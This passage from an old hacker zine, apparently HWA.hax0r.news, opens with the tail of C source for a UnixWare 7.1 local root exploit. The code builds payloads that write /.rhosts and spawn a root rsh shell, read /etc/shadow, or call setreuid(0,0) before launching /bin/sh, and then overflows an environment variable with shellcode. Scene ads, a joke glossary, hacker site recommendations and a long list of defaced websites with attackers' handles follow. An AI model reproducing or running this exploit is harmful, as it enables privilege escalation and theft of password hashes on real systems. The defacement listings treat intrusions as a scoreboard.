/.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
\"); }\n"
#define DACREAD "void main() { system(\"cat /etc/shadow\");}\n"
#define SETUID "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"

void usage(int ftype)
{
    fprintf(stderr, "Error: Usage: truck [filetype]\n");
    fprintf(stderr, "Where filetype is one of the following: \n");
    fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
    fprintf(stderr, "Note: if file has allprivs, use setuid\n");
}

void buildsm(int ftype)
{
    FILE *fp;
    char cc[100];

    fp = fopen("/tmp/sm.c", "w");
    if (ftype == 1)
        fprintf(fp, DACREAD);
    else if(ftype == 2)
        fprintf(fp, DACWRITE);
    else if(ftype == 3)
        fprintf(fp, SETUID);
    fclose(fp);

    snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
    system(cc);
}

int main(int argc, char *argv[])
{
    int i;
    int buflen = LEN;
    char buf[LEN];
    int filetype = 0;
    char filebuf[20];

    if(argc > 2 || argc == 1) {
        usage(filetype);
        exit(0);
    }

    if ( argc > 1 )
        filetype=atoi(argv[1]);

    if ( filetype > 3 || filetype < 1 ) {
        usage(filetype);
        exit(-1);
    }

    buildsm(filetype);

    fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");

    memset(buf,NOP,buflen);
    memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
    memcpy(buf, "XNEC=", 5);
    putenv(buf);
    buf[buflen - 1] = 0;

    system("/bin/sh");
    exit(0);
}
/* www.hack.co.za */

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE

http://revenger.hypermart.net

T E X T Z   F I L E   H O M E P A G E
http://revenger.hypermart.net

Here you may find up to 340 text files for: ANARCHY, HACKING, GUIDES,
CRACKING, VIRUS, GENERAL, ELECTRONICS, UNIX, MAGAZINES, TOP SECRET, CARDING,
U.F.O.s, LOCKPICKING, IRC, PHREAKING, BOOKS AND A-S FILES AVAILABLE!

http://revenger.hypermart.net   Visit Us Now !

- / -  w w w . h a c k u n l i m i t e d . c o m  - / -
*****************************************************************************
*                                                                           *
*   ATTRITION.ORG                              http://www.attrition.org     *
*   ATTRITION.ORG   Advisory Archive, Hacked Page Mirror                    *
*   ATTRITION.ORG   DoS Database, Crypto Archive                            *
*   ATTRITION.ORG   Sarcasm, Rudeness, and More.                            *
*                                                                           *
*****************************************************************************

When people ask you "Who is Kevin Mitnick?" do you have an answer?

    Support 2600.com and the Free Kevin defense fund site, visit it now!
    FREE KEVIN!

    http://www.2600.com/
    http://www.kevinmitnick.com
    http://www.freekevin.com

+-----------------------------------------------------------------------------+
| SmoG Alert ..          http://smog.cjb.net/             NEWS on SCIENCE     |
| ===================    http://smog.cjb.net/             NEWS on SECURITY    |
| NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/             NEWS on THE NET     |
|                        http://smog.cjb.net/             NEWS on TECHNOLOGY  |
+-----------------------------------------------------------------------------+

* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net
* http://www.csoft.net  One of our sponsors, visit them now

* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD

* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press,usmc.net, put AD! in the subject header please.          - Ed //
// or cruciphux@dok.org                                                    //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...

Submitted by Deflux, check out his site at http://www.advdata.net/~deflux/

Define your terms for software releases:

Advanced User: A person who has managed to remove a computer from its packing
materials.

Power User: A person who has mastered the brightness and contrast controls on
any computer monitor.

American Made: Assembled in America from parts made abroad.

Alpha Test Version: Too buggy to be released to the paying public.

Beta Test Version: Still too buggy to be released.

Release Version: Alternate pronunciation of "Beta Test Version".

Sales Manager: Last week's new sales associate.
Consultant: A former sales associate who has mastered at least one tenth of
the dBase III Plus Manual.

Systems Integrator: A former consultant who understands the term AUTOEXEC.BAT.

AUTOEXEC.BAT: A sturdy aluminum or wooden shaft used to coax AT hard disks
into performing properly.

Backup: The duplicate copy of crucial data that no one bothered to make; used
only in the abstract.

Clone: One of the many advanced-technology computers IBM is beginning to wish
it had built.

Convertible: Transformable from a second-rate computer to a first-rate
doorstop or paperweight. (Replaces the term "junior".)

Copy Protection: A clever method of preventing incompetent pirates from
stealing software and legitimate customers from using it.

Database Manager: A program that allows users to manipulate data in every
conceivable way except the absolutely essential way they conceive of the day
after entering 20 megabytes of raw data.

EMS: Emergency Medical Service; often summoned in cases of apoplexy induced by
attempts to understand extended, expanded, or enhanced memory specs.

Encryption: A powerful algorithmic encoding technique employed in the creation
of computer manuals.

FCC-Certified: Guaranteed not to interfere with radio or television reception
until you add the cable that is required to make it work.

Hard Disk: A device that allows users to delete vast quantities of data with
simple mnemonic commands.

Integrated Software: A single product that deftly performs hundreds of
functions that the user never needs and awkwardly performs the half-dozen he
uses constantly.

Laptop: Smaller and lighter than the average breadbox.

Multitasking: A clever method of simultaneously slowing down the multitude of
computer programs that insist on running too fast.

Network: An electronic means of allowing more than one person at a time to
corrupt, trash, and otherwise cause permanent damage to useful information.

Portable: Smaller and lighter than the average refrigerator.

Support: The mailing of advertising literature to customers who have returned
a registration card.

Transportability: Neither chained to a wall nor attached to an alarm system.

Printer: An electromechanical paper shredding device.

Spreadsheet: A program that gives the user quick and easy access to a wide
variety of highly detailed reports based on highly inaccurate assumptions.

Thought Processor: An electronic version of the intended outline procedure
that thinking people instantly abandon upon graduation from high school.

Upgraded: Didn't work the first time.

User Friendly: Supplied with a full color manual.

Very User Friendly: Supplied with a disk and audiotape so the user need not
bother with the full color manual.

Version 1.0: Buggier than Maine in June; eats data.

Version 1.1: Eats data only occasionally; upgrade is free, to avoid litigation
by disgruntled users of Version 1.0.

Version 2.0: The version originally planned as the first release, except for
a couple of data-eating bugs that just won't seem to go away; no free upgrades
or the company would go bankrupt.

Version 3.0: The revision in the works when the company goes bankrupt.

Videotex: A moribund electronic service offering people the privilege of
paying to read the weather on their television screens instead of having
Willard Scott read it to them free while they brush their teeth.

Warranty: Disclaimer.

Workstation: A computer or terminal slavishly linked to a mainframe that does
not offer game programs.

(The previous list of terms was copied from the Government Computer News,
November 21, 1988 issue. The original data was provided by the WIC
Connection.)

SITE.1

http://www.temporal.org/thescene/pics/

Wonder who's behind the nick on IRC? or in the scene? check this link out to
see some of the more well known people from around irc etc...

http://www.hack.co.za/
By: Gov-Boi

Recently updated, looks clean, some graphics, not a bad layout, no more text
only. always a good site for recent exploits, give it a visit.

http://hhp.perlx.com/
By: Loophole

Very nice and well done site by an oldschool ninja... can be found on irc but
don't harass him or he'll get medieval on your ass!...you can find exploits,
advisories and the like here, it's a work in progress, brand new site. Looks
promising! - Ed

http://www.scriptkiddies.org/

Well it had to happen, they even have merchandizing, check it out, more news,
tech and otherwise, scene gossip, tips and articles. can u dig it?

Note: new site, some stuff isn't setup yet but should be soon...at least it
looks sweet. - Ed

You can Send in submissions for this section too if you've found (or RUN) a
cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups
like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.

>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

* Info supplied by the attrition.org mailing list.

Listed oldest to most recent...
Defaced domain: www.activedev.net
Site Title: Active Development
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.activedev.net
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.18, 99.12.15, 99.12.07 by acidklown, pyrostorm666, pyrostorm666
Potentially offensive content on defaced page.

Defaced domain: www.chegamais.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.chegamais.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: image1.ouhsc.edu
Site Title: University of Oklahoma Health Sciences Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/image1.ouhsc.edu
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.allianceenterprises.com
Site Title: Alliance Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.allianceenterprises.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.firstgpa.com
Site Title: First American Gropu Purchasing Association
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.firstgpa.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.webdr.com
Site Title: The WEB Doctor
Mirror: http://www.attrition.org/mirror/attrition/1999/12/19/www.webdr.com
Defaced by: relogic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.benthic.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.benthic.com
Defaced by: Wolf
Operating System: Irix (Rapidsite/Apa-1.3.4 FrontPage)
Potentially offensive content on defaced page.

Defaced domain: www.teddies4ever.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.teddies4ever.com
Defaced by: WKD
Operating System: Solaris

Defaced domain: www.harp-industries.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.harp-industries.
Defaced by: inkk
Operating System: Solaris 2.6 - 2.7
Potentially offensive content on defaced page.

Defaced domain: www.nsbrasil.org
Site Title: Melckzedeck Aquino de Aracjo
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.nsbrasil.org
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.alas.net
Site Title: Alexandre Simoes
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.alas.net
Defaced by: Death Knights
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.

Defaced domain: www.thsrock.net
Site Title: Trinity High School RockNet
Mirror: http://www.attrition.org/mirror/attrition/1999/12/20/www.thsrock.net
Defaced by: Pezzdc
Operating System: Windows NT (WebSitePro/2.3.15)
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page.

Defaced domain: www.cm-lisboa.pt
Site Title: Câmara Municipal de Lisboa
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cm-lisboa.pt
Defaced by: F0rpaxe
Operating System: Windows NT
Attrition comment: This is the Web site for the Governor of Lisbon, the capital of Portugal

Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: games.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/games.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: cardserver.eesite.com
Site Title: Echelon Entertainment
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/cardserver.eesite.com
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.itaipu.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.itaipu.gov.br
Defaced by: inferno.br
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.torahacademy.org
Site Title: MTC Enterprises
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.torahacademy.org
Defaced by: unknown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by f1ber
Potentially offensive content on defaced page.

Defaced domain: www.smc.com.br
Site Title: SMC Internet Services
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.smc.com.br
Defaced by: Ass0mbracao
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: sugok.chongju-e.ac.kr
Site Title: ChongJu National University of Education
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/sugok.chongju-e.ac.k
Defaced by: JvM
Operating System: Solaris 2.6
Potentially offensive content on defaced page.

Defaced domain: www.map.org
Site Title: MAP International
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.map.org
Defaced by: unknown
Operating System: Solaris 2.6 - 2.7
Previously defaced on by
Potentially offensive content on defaced page.

Defaced domain: www.arc.gov
Site Title: Appalachian Regional Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.arc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.fairus.org
Site Title: FAIR
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.fairus.
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 99.12.18 by
Potentially offensive content on defaced page.

Defaced domain: facepe.pe.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/facepe.pe.gov.br
Defaced by: Shadow
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cisco.net
Site Title: Cisco.Net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.cisco.net
Defaced by: Digital Domination
Operating System: Digital Unix (Apache/1.2.6 FrontPage/3.0.4)
Previously defaced on 99.12.19 by DD
Potentially offensive content on defaced page.

Defaced domain: eagles.eems.giles.k12.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/eagles.eems.giles.k12.va.us
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.21 by Verb0
Potentially offensive content on defaced page.

Defaced domain: www.theisp.net
Site Title: Discovery Online, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/21/www.theisp.net
Defaced by: Uneek Tech
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.virtualshack.com
Site Title: virtualshack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.virtualshack.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: members.geosoft.org
Site Title: The Geosoft Network
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/members.geosoft.org
Defaced by: HiP
Operating System: Windows NT (Apache 1.3.9 Win32)
Potentially offensive content on defaced page.

Defaced domain: www.thegolftravelcenter.com
Site Title: Randy Young (THEGOLFRAVELCENTER-DOM)
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.thegolftravelcenter.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.
Attrition comment: Also defaced www.smc.com.br

Defaced domain: www.contrast-clothing.com
Site Title: Contrast Clothing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.contrast-clothing.com
Defaced by: unknown
Operating System: NT
HIDDEN comments in the HTML.

Defaced domain: www.oirm.bia.gov
Site Title: Office of Information Resources Management, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.oirm.bia.gov
Defaced by: phiber
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.cya.ca.gov
Site Title: California Department of Youth Authority
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cya.ca.gov
Defaced by: phiber
Operating System: Windows NT

Defaced domain: www.irr.bia.gov
Site Title: Indian Reservation Roads Program, Bureau of Indian Affairs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.irr.bia.gov
Defaced by: phiber
Operating System: Windows NT

Defaced domain: www.ocf.anl.gov
Site Title: Office of the Chief Financial Officer, Argonne National Labs
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.ocf.anl.gov
Defaced by: phiber
Operating System: Windows NT

Defaced domain: www.calgold.ca.gov
Site Title: CalGOLD Business Permits
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.calgold.ca.gov
Defaced by: phiber
Operating System: Windows NT

Defaced domain: www.samaritan.org
Site Title: Samaritan's Purse
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.samaritan.org
Defaced by: B.L.Z. Bub
Operating System: NT
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.zenworksmaster.com
Site Title: ZENMaster
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.zenworksmaster.com
Defaced by: Ass0mbracao
Operating System: NT
Previously defaced on 99.12.19 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.fmc.gov
Site Title: Federal Maritime Commission
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.fmc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: democrats.assembly.ca.gov
Site Title: California State Assembly Democratic Caucus
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/democrats.assembly.ca.gov/
Defaced by: phiber
Operating System: Windows NT

Defaced domain: www.taonline.com
Site Title: DI-USA, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.taonline.com
Defaced by: Pyrostorm666
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.pitt.ang.af.mil
Site Title: Air National Guard
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.pitt.ang.af.mil
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.laredo.k12.tx.us
Site Title: Texas K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.laredo.k12.tx.us
Defaced by: Ass0mbracao
Operating System: Windows NT or WFW 3.11
Previously defaced on 99.12.16 by f1ber
Potentially offensive content on defaced page.

Defaced domain: www.dfi.ca.gov
Site Title: State of California
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.dfi.ca.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.h-c-v.org
Site Title: HCV
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.h-c-v.org
Defaced by: ezoons
Operating System: FreeBSD 2.2.1
Potentially offensive content on defaced page.

Defaced domain: www.upshq.com
Site Title: United Phreaks Syndicate
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.upshq.com
Defaced by: MOTHERFUCKER GRANDPA NIGZ
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cssc.gov
Site Title: Customer Systems Support Center
Mirror: http://www.attrition.org/mirror/attrition/1999/12/22/www.cssc.gov
Defaced by: phiber
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.jcomtraining.com
Site Title: JCom Computer Training
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.jcomtraining.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cascades-spa.com
Site Title: 2032272 Nova Scotia Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cascades-spa.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.drkenner.com
Site Title: Dr. Harris Kenner
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.drkenner.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.lunarvision.com
Site Title: Lunar Video Communications
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lunarvision.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: cpma.apg.army.mil
Site Title: Army Signal Command
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/cpma.apg.army.mil
Defaced by: THESAINT666
Operating System: NT
Previously defaced on 99.12.04 by k-0s

Defaced domain: www.k9express.com
Site Title: RD&K Associated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.k9express.com
Defaced by: BLN
Operating System: NT

Defaced domain: www.bankerusa.com
Site Title: Banker of USA Mortgage
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.bankerusa.com
Defaced by: THESAINT666
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.04.23 by tonekore
Potentially offensive content on defaced page.

Defaced domain: www.freezonez.com
Site Title: Blasie Tech
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.freezonez.com
Defaced by: wired
Operating System: FreeBSD (Apache 1.2.6)
Potentially offensive content on defaced page.

Defaced domain: www.infoctr.edu
Site Title: Library of International Relations
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.infoctr.edu
Defaced by: THESAINT666
Operating System: NT

Defaced domain: www.hotelsmexico.com
Site Title: Posadas de Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.hotelsmexico.com
Defaced by: THESAINT666
Operating System: NT

Defaced domain: www.leet-2000.com
Site Title: anastacio esteviz
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.leet-2000.com
Defaced by: styles
Operating System: BSDI (Apache 1.3.6)
Potentially offensive content on defaced page.

Defaced domain: www.expoente.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.expoente.com.br
Defaced by: Ass0mbracao/OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.10.19 and 99.12.11 by OHB and Death Knights
Potentially offensive content on defaced page.

Defaced domain: www.acommedia.com
Site Title: ACom Media Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.acommedia.com
Defaced by: phiber
Operating System: Red Hat Linux (Apache 1.3.3)
Potentially offensive content on defaced page.

Defaced domain: www.conagg.com
Site Title: Construction Aggregate Equipment Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.conagg.com
Defaced by: Unknown since their HTML called a bad image.
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.ndn.co.jp
Site Title: Nippon Data Net Limited Partnership
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.ndn.co.jp
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.03.05 99.10.31 99.10.29 by xoloth1 () DHC
Potentially offensive content on defaced page.

Defaced domain: www.lyon.k12.ky.us
Site Title: Kentucky K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lyon.k12.ky.us
Defaced by: PurpleHaze
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.gddc.pt
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.gddc.pt
Defaced by: Shandar
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cphv.org
Site Title: Center to Prevent Handgun Violence
Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cphv.org
Defaced by: Ass0mbracao
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.19 by Analognet
Potentially offensive content on defaced page.

Defaced domain: www.goprismatic.com
Site Title: Totally Bogus Men Company
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.goprismatic.com
Defaced by: #phreak.nl
Operating System: Linux (Apache 1.3.4)
Potentially offensive content on defaced page.

Defaced domain: www.sicily.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.sicily.navy.mil
Defaced by: THESAINT666
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.ordermed.com
Site Title: ordermed
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.ordermed.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.mute300.net
Site Title: MUTE300
Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.mute300.net
Defaced by: crack & crx
Operating System: FreeBSD (Apache 1.2.6)
Previously defaced on 99.11.17 by Sabu
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.
Defaced domain: www.domain-network.net Site Title: BLAH Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.domain-network.net Defaced by: wired Operating System: FreeBSD (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.inet.tsinghua.edu.cn Site Title: Institute of Nuclear Energy Technology of Tsinghua University Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.inet.tsinghua.edu.cn Defaced by: Bosnatek Operating System: Solaris 2.5x Potentially offensive content on defaced page. Defaced domain: www.jadenterprises.com Site Title: J.A.D. Enterprises Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.jadenterprises.com Defaced by: w0lf Operating System: Irix? (Rapidsite/Apa-1.3.4) Potentially offensive content on defaced page. Defaced domain: www.asiplc.com Site Title: Automation Solutions, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.asiplc.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.webquestcom.com Site Title: Conquest Communications, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.webquestcom.com Defaced by: Rhallado Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.networkmediadevices.com Site Title: Network Media Devices, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.networkmediadevices.com Defaced by: BOG Operating System: Linux (Apache 1.3.6) Potentially offensive content on defaced page. Defaced domain: www.colella.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.colella.com.br Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
Defaced domain: www.planet3000.com Site Title: Sebastian Harrison Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.planet3000.com Defaced by: Rhallado Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cafepiupiu.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.cafepiupiu.com.br Defaced by: hts & white_course Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.presbycoalition.org Site Title: The Presbyterian Coalition Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.presbycoalition.org Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.vvs-online.com Site Title: V.V.S. bvba Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.vvs-online.com Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page Defaced domain: www.imagemine.com Site Title: imagemine Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.imagemine.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tdicomputers.com Site Title: Aerodiam nv Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.tdicomputers.com Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. 
and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links
section on the http://welcome.to/HWA.hax0r.news/ url so check there for
current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
